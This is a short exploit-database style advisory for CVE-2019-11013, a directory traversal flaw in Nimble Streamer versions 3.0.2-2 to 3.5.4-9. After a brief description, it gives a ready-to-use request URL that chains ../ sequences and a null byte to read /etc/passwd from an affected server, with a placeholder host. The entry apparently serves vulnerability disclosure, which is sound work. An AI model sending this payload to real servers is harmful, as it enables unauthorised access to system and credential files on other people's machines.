# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
#Successful exploitation could allow an attacker to traverse the file system to access
#files or directories that are outside of the restricted directory on the remote server.
- http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448